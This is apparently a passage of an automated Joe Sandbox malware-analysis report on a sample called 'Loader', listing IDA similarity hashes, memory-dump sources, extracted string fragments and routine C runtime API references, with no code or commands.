                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a106ae0547f426f620a6ff4611269fc179fed7223d269db832802459988ce342
                                                                            • Instruction ID: 7aec2d038710aac64f311c03877976f7f650c516ea93b1597ca217e56bd7a47c
                                                                            • Opcode Fuzzy Hash: a106ae0547f426f620a6ff4611269fc179fed7223d269db832802459988ce342
                                                                            • Instruction Fuzzy Hash: B3419271D14249CFCB08CF98D6814AEFBB2FF56310B24994BE442BB142C374EA91CB65
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ea734933c9a95bb7a811b25efaa191a4db12128e2f98952f5eeef785284cb96e
                                                                            • Instruction ID: 8333d6ffbacaecccef3f11710a7c8d6ec9730548431e5980c74ad6b7f4d9a2ce
                                                                            • Opcode Fuzzy Hash: ea734933c9a95bb7a811b25efaa191a4db12128e2f98952f5eeef785284cb96e
                                                                            • Instruction Fuzzy Hash: 77315C70D10219CFCB08CF98D5814AEFBB2FF96310B24995BE446BB241C770EA91DB66
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0372afc84e88139d06a11da27e2344b344367ad23fd3aa261495fb743f3a2cd9
                                                                            • Instruction ID: 83f6d3dfe5d511783f1d1957765a00935f9c4ebe2c15e4eae88a2f68a1917682
                                                                            • Opcode Fuzzy Hash: 0372afc84e88139d06a11da27e2344b344367ad23fd3aa261495fb743f3a2cd9
                                                                            • Instruction Fuzzy Hash: 47313E70D10219CF8B08CF98C6818AEFBB2FF56310B24D81BE406B6245D770EA91CB66
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60d76cce87223f0dc6159567b3276b0011218ca79e590dd13d5592263184758e
                                                                            • Instruction ID: 08999c6c1c16224fdf3ad08ebd6cb7ae9662c0b68bab060bd40b7d03a514040c
                                                                            • Opcode Fuzzy Hash: 60d76cce87223f0dc6159567b3276b0011218ca79e590dd13d5592263184758e
                                                                            • Instruction Fuzzy Hash: 3A314D70D10219CFCB08CF98D5814AEFBB2FF96310B24991BE406BB245D774EA91DB66
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2f49dd46fecf9342fad0f3d3fd1acadecb4bc3551226e3e50fa60c14161fb0f7
                                                                            • Instruction ID: 3419211cf3f1c13f0f16c85933b1af7c44fad19d0b17234d68e41063067f23ff
                                                                            • Opcode Fuzzy Hash: 2f49dd46fecf9342fad0f3d3fd1acadecb4bc3551226e3e50fa60c14161fb0f7
                                                                            • Instruction Fuzzy Hash: 27314D70D10219CFCB08CF98D5814AEFBB2FF56310B24981BE406BB241C774EA91CB66
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0cfa06287c729573f0fa1a2144b268d937de13fabdac116ac4e1ee5acee0f7c2
                                                                            • Instruction ID: 41c524f712ec3e79fac7c4dbed0a62b43dc28340fbe7655ed5eb3b37757faa7a
                                                                            • Opcode Fuzzy Hash: 0cfa06287c729573f0fa1a2144b268d937de13fabdac116ac4e1ee5acee0f7c2
                                                                            • Instruction Fuzzy Hash: 5F210D36B146714FE3448F65DCD026673A3FFC6224F0A8234EEA6973E5C670E811C645
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 182ff49e939f1398294b9512b1f3ca232d73da5c2630492eafcdb88c1e4c075a
                                                                            • Instruction ID: c6bdc6ccd6abd961d55a018daa39e0ec40a5fd05db6700278fa284d6ccbf2e5d
                                                                            • Opcode Fuzzy Hash: 182ff49e939f1398294b9512b1f3ca232d73da5c2630492eafcdb88c1e4c075a
                                                                            • Instruction Fuzzy Hash: A21123B5A193909FD784DF25D99152BBAF8EB86308F889C2CE492E7350D734C502CF06
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96ccec21401edb20b9aceaf9688996d9eeb2ecb12b31d1f3d13a469f16b764ac
                                                                            • Instruction ID: f7ed19a28ee7b7d0966d9735e8c931ffdf5f0efceecbd49ecbd6beea2d9c3980
                                                                            • Opcode Fuzzy Hash: 96ccec21401edb20b9aceaf9688996d9eeb2ecb12b31d1f3d13a469f16b764ac
                                                                            • Instruction Fuzzy Hash: EA019EB18193449BD2449FA5C4A571BFBE4AB82314F505D2CF1D687290D7798505CF52
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8ef43b0e05eaa2cb8996145f05dbaa100814a2fd4d2f81312e9ed4969d081c83
                                                                            • Instruction ID: db603db883a2e6d5eb8cb6e034893181da36b3f1de5689bd6f9a09e8ec6ca9b9
                                                                            • Opcode Fuzzy Hash: 8ef43b0e05eaa2cb8996145f05dbaa100814a2fd4d2f81312e9ed4969d081c83
                                                                            • Instruction Fuzzy Hash: 33B011A8E0820082A0008F20A8008FAE2BC8A0F00CF003820C20AA3203E322EA08828E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: !$"$#$%$($+$.$/$8$;$<$=$a$c$e$e$g$i$k$m$o$s$t$u$w$x$y${$}
                                                                            • API String ID: 0-665085891
                                                                            • Opcode ID: d49e0deb952383cce28578a3653d6de89ca5845d130c1f711584ab1759b6aa34
                                                                            • Instruction ID: 8a6b5d61ec0289cdea00908ddc3b0eed02fcc1c0fb587913886a7345f375686e
                                                                            • Opcode Fuzzy Hash: d49e0deb952383cce28578a3653d6de89ca5845d130c1f711584ab1759b6aa34
                                                                            • Instruction Fuzzy Hash: 8D913B2160CBC18AE336863C844839FBED11BE7224F098F9DE5E94B3D6C6B98445C767
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: !$"$#$%$($+$.$/$8$;$<$=$a$c$e$e$g$i$k$m$o$s$t$u$w$x$y${$}
                                                                            • API String ID: 0-665085891
                                                                            • Opcode ID: a43a93e6f011965443b61dbedbe7747b18c2c2aba1a84f7b1b6c23020b45f27e
                                                                            • Instruction ID: b222e25efa72ec0dac5e6bf477252032725248b5a94b94a5523fc67c64147db2
                                                                            • Opcode Fuzzy Hash: a43a93e6f011965443b61dbedbe7747b18c2c2aba1a84f7b1b6c23020b45f27e
                                                                            • Instruction Fuzzy Hash: FD813D2151CBC18DE336863C844835ABED11BE7324F184FADE5E98B3D6C6B98546C763
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %$($+$-$.$/$/$/$3$4$6$:$;$A$J$L$O$X$X$[$\$]$e$~
                                                                            • API String ID: 0-2442427157
                                                                            • Opcode ID: 26ce1e4511ddc40be6b3e9ce31a401707789bd5e524813312b9e9841b9288bf6
                                                                            • Instruction ID: 43cc2a498c3688d5c99ab62d28be49a00f844bdbdbc2d159867374c8488c0c23
                                                                            • Opcode Fuzzy Hash: 26ce1e4511ddc40be6b3e9ce31a401707789bd5e524813312b9e9841b9288bf6
                                                                            • Instruction Fuzzy Hash: 0561E42050CBC189E3329B7C984C78BBED15BE6224F484F9DE1E84B3D2C77545468767
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $D$,D$4D$<D$DD$LD$TD$TD$\D$\D$dD$dD$lD$lD$tD$tD$|D$|D$D$D
                                                                            • API String ID: 0-1343015416
                                                                            • Opcode ID: ffbf46c5448f86090d7c31a2251d10b5cdea94c9c04753fc7ce7baba14decfcf
                                                                            • Instruction ID: 0f4a317b66275112db4f6b66a6d382a5bd7fef4b69cfd172a4acfaf2d384e717
                                                                            • Opcode Fuzzy Hash: ffbf46c5448f86090d7c31a2251d10b5cdea94c9c04753fc7ce7baba14decfcf
                                                                            • Instruction Fuzzy Hash: 5FC1F6B095A3C18BE770AF02C5487EBBAE4BFC5308F54891E91A81A345C7B90148DF9B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: !$!@$#$&$&$($,$-$.$1$1$5$5$6$6$7$9$:
                                                                            • API String ID: 0-365062771
                                                                            • Opcode ID: 470f9ac1143cb14bb3dfe00f50bbe8b7e7812a675e9088dee4b51197d5e8b11f
                                                                            • Instruction ID: fc4be2607ebacf4150556d7e49cd6364ea15cd94f414fcc8fb9b57d26f53bf24
                                                                            • Opcode Fuzzy Hash: 470f9ac1143cb14bb3dfe00f50bbe8b7e7812a675e9088dee4b51197d5e8b11f
                                                                            • Instruction Fuzzy Hash: B081D2B000E7899AE371CF21C55C7DBBAE4FB85348F50890E86D81A754CBB99149DFCA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: I$K$L$N$V$V$X$Y$Y$]$_$q
                                                                            • API String ID: 0-2073889574
                                                                            • Opcode ID: 508dcf0ab84d9945c61d6204bcccc03ab3e58d021f3621e2796ab83611b33502
                                                                            • Instruction ID: 8cc431dbca87f8ca108366c25efb30d49b29afc88217ca9a07fa6b5269fdba92
                                                                            • Opcode Fuzzy Hash: 508dcf0ab84d9945c61d6204bcccc03ab3e58d021f3621e2796ab83611b33502
                                                                            • Instruction Fuzzy Hash: AB416D7150C791CFE340EFB8D58839FBFE0AB92318F254C2DD5C986292E6B985488767
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,q's$?u>w$@=E?$Q!R#$S)J+$Z-^/$x%F'$A"C$EG$IK$U?W$Y[
                                                                            • API String ID: 0-4103194446
                                                                            • Opcode ID: 573368589da63e6c59b33154dee8c7440ffcd4a98d8eca67f839d921efb52f65
                                                                            • Instruction ID: 3f02b1fde51ed4dca5b5886b93bcccf5c03f96d3be47424ae19f7cce059a867b
                                                                            • Opcode Fuzzy Hash: 573368589da63e6c59b33154dee8c7440ffcd4a98d8eca67f839d921efb52f65
                                                                            • Instruction Fuzzy Hash: 3351FCB4548385EBE3349F51D981B8BBAA0BB92744F518E1CD6E82B315D7B08045CF9A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8W?I$A+i-$C;D=$E3C5$L#]%$^/i!$r7B)${?R1$su${}
                                                                            • API String ID: 0-1480604604
                                                                            • Opcode ID: 90427a17978d7f6236a27ed06e232c9036be19183bc773367f02727d9f4fa3b9
                                                                            • Instruction ID: 53c34025ee623497fcdd4dcf53da3e29c61f31b6cc2f0a34bbc47c1a5c7d82f0
                                                                            • Opcode Fuzzy Hash: 90427a17978d7f6236a27ed06e232c9036be19183bc773367f02727d9f4fa3b9
                                                                            • Instruction Fuzzy Hash: 2C7111B19083808BD3348F6584923DBBBF1EF96318F148A2DD5D84B2A5D7B489858F83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$$$q$s$u$w$x$y${$}
                                                                            • API String ID: 0-3743081959
                                                                            • Opcode ID: 04d403ee78875496e9eea4a3f2d4781e3b4e6ee94b7c0229ae0b042217dd2cae
                                                                            • Instruction ID: 281f4f67ccf6b425ae4a5f76af8e14ead2febb3251209092097cce3f7c3d0d59
                                                                            • Opcode Fuzzy Hash: 04d403ee78875496e9eea4a3f2d4781e3b4e6ee94b7c0229ae0b042217dd2cae
                                                                            • Instruction Fuzzy Hash: 0241593161C7C08ED3388A7884553DBBAD2AFD6328F094A6DD5DD4B3D2C7B948448753
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$$$q$s$u$w$x$y${$}
                                                                            • API String ID: 0-3743081959
                                                                            • Opcode ID: ff44a72933bf03427955208b0c1cda0334b5d4df1c63053f90a6e7e71531d6b2
                                                                            • Instruction ID: f4bb75267c3dc1e16c53be1602745c5af7ef34d626b6d85c9cfd8d51916d3bed
                                                                            • Opcode Fuzzy Hash: ff44a72933bf03427955208b0c1cda0334b5d4df1c63053f90a6e7e71531d6b2
                                                                            • Instruction Fuzzy Hash: 11416C21A1C7C08ED335866888583DBBED25FE2328F0D8AACD5DD0B3E2C7B954458353
                                                                            APIs
                                                                            • type_info::operator==.LIBVCRUNTIME ref: 6E4FA009
                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 6E4FA117
                                                                            • _UnwindNestedFrames.LIBCMT ref: 6E4FA269
                                                                            • CallUnexpected.LIBVCRUNTIME ref: 6E4FA284
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                            • String ID: csm$csm$csm
                                                                            • API String ID: 2751267872-393685449
                                                                            • Opcode ID: fee9dfc712402d3dcd278118155b98ddaa8f85ed576bd569302facdf702b6c43
                                                                            • Instruction ID: f4c23d7b545e03b9dcaee05399268a7183e13fed5bcfc9c7de243c949453ef1f
                                                                            • Opcode Fuzzy Hash: fee9dfc712402d3dcd278118155b98ddaa8f85ed576bd569302facdf702b6c43
                                                                            • Instruction Fuzzy Hash: E7B1437190020AEFCF05CFF4D980D9EB7B9EF84B15B11495AE8106B315D732EA52DBA2
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6E4F8FC7
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6E4F8FCF
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6E4F9058
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6E4F9083
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6E4F90D8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            • Opcode ID: d498cc1843472f744b9adae4f13ad2d0135e8a98a1c20bae2e101c080bb2dfeb
                                                                            • Instruction ID: 075649e0064dc8159b26426d3f9e58640743fe132432734befb5f2103f36b903
                                                                            • Opcode Fuzzy Hash: d498cc1843472f744b9adae4f13ad2d0135e8a98a1c20bae2e101c080bb2dfeb
                                                                            • Instruction Fuzzy Hash: 9C415034A00149DFCF00CFEAC884E9E7BA9AF85718F14855AEA14AB355D732A916CF91
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00000000,?,6E4FDF6C,00000000,6E4FB770,00000000,00000000,00000001,?,6E4FE0E6,00000022,FlsSetValue,6E505688,6E505690,00000000), ref: 6E4FDF1E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID: api-ms-$ext-ms-
                                                                            • API String ID: 3664257935-537541572
                                                                            • Opcode ID: 42ee65654371b008de6a4a4def50f75b1b4d650669d4c8a323c32c0f2f0be503
                                                                            • Instruction ID: b5cfee642823e7b15761a397220f1095aa2d30406a0837078e4e9d8691214e7e
                                                                            • Opcode Fuzzy Hash: 42ee65654371b008de6a4a4def50f75b1b4d650669d4c8a323c32c0f2f0be503
                                                                            • Instruction Fuzzy Hash: B521C336905911EBDB118BB58C64F4B37A9DBD3B64B120126F911AB380DB30EE03CEE0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$4$5$5$:$:$;$;
                                                                            • API String ID: 0-2736053740
                                                                            • Opcode ID: b12d8d019e17c04f5cb6ae8458d99f7e5145083ce2e65e4e603cb09dfc062c39
                                                                            • Instruction ID: 692666e91c3bfea8a5686bb1a83c8b51ebc3bcf295f51ca5643fe159b4d53f5b
                                                                            • Opcode Fuzzy Hash: b12d8d019e17c04f5cb6ae8458d99f7e5145083ce2e65e4e603cb09dfc062c39
                                                                            • Instruction Fuzzy Hash: B851017660C3828FD324CBA8C89839ABBE26BD6354F198D3ED5D8573C1C7789844CB42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$4$5$5$:$:$;$;
                                                                            • API String ID: 0-2736053740
                                                                            • Opcode ID: c747241c27af526782d491eb025e49fdb9dabb3bdf265b19d2e97867d677c49d
                                                                            • Instruction ID: dc6b5c7088486f4636ab894eaf63bf158846dd0282721740a026ae09d9a0e646
                                                                            • Opcode Fuzzy Hash: c747241c27af526782d491eb025e49fdb9dabb3bdf265b19d2e97867d677c49d
                                                                            • Instruction Fuzzy Hash: 4751023265C3818FD324CBA8C8907AA7BE26BC6354F19897EC4D8973C1CB789840C743
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4$4$5$5$:$:$;$;
                                                                            • API String ID: 0-2736053740
                                                                            • Opcode ID: 149e46bba9adf0c87ecc231f3d17da9b5d0843504ffbca05c66cc5bd46323692
                                                                            • Instruction ID: 6810953a2838abd43f5118954b94da4050d593dadfa12796bb0e0a53078d362c
                                                                            • Opcode Fuzzy Hash: 149e46bba9adf0c87ecc231f3d17da9b5d0843504ffbca05c66cc5bd46323692
                                                                            • Instruction Fuzzy Hash: 3351F07E51D3C18FE325CBA8C89079A7BE16B86354F198E7DC5D8572C2C7B89840CB42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: =i<o$J!G'$K=C#$U`3$`1d7$d5h;${){/${-S
                                                                            • API String ID: 0-1055848192
                                                                            • Opcode ID: 4330c83bd3902cee50c249b837b8d5e177b015b7eb770b91e5233411d865ff69
                                                                            • Instruction ID: f73e7fe1c215ec635017ceacaccf724b009de8d86596f5e0d927346804c09655
                                                                            • Opcode Fuzzy Hash: 4330c83bd3902cee50c249b837b8d5e177b015b7eb770b91e5233411d865ff69
                                                                            • Instruction Fuzzy Hash: DD51C8B000D7809BE2709F11E881B9FBBF5BBD2784F208E1CD2E91A255E7758046CF92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ";7>$&> &$));*$,#15$2821$5:',$d$z,>9
                                                                            • API String ID: 0-3050492773
                                                                            • Opcode ID: 96a8b58cc2d615ff36c6967098bc0e4b08fdb69918352712e2d3b66006053e0b
                                                                            • Instruction ID: ccccc87675de3645b57e18d3efdfc8d846ad3be5a7c0a0e5795f2e4bad4b5f95
                                                                            • Opcode Fuzzy Hash: 96a8b58cc2d615ff36c6967098bc0e4b08fdb69918352712e2d3b66006053e0b
                                                                            • Instruction Fuzzy Hash: 473137B844C3848BD3798F61D8917DFBFE0EB96704F109E1CD2C98A241C7B8055A8B97
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000001,?,6E4F9171,6E4F8270,6E4F7C89,?,6E4F7EC1,?,00000001,?,?,00000001,?,6E509498,0000000C,6E4F7FBA), ref: 6E4F954A
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E4F9558
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E4F9571
                                                                            • SetLastError.KERNEL32(00000000,6E4F7EC1,?,00000001,?,?,00000001,?,6E509498,0000000C,6E4F7FBA,?,00000001,?), ref: 6E4F95C3
                                                                            Memory Dump Source
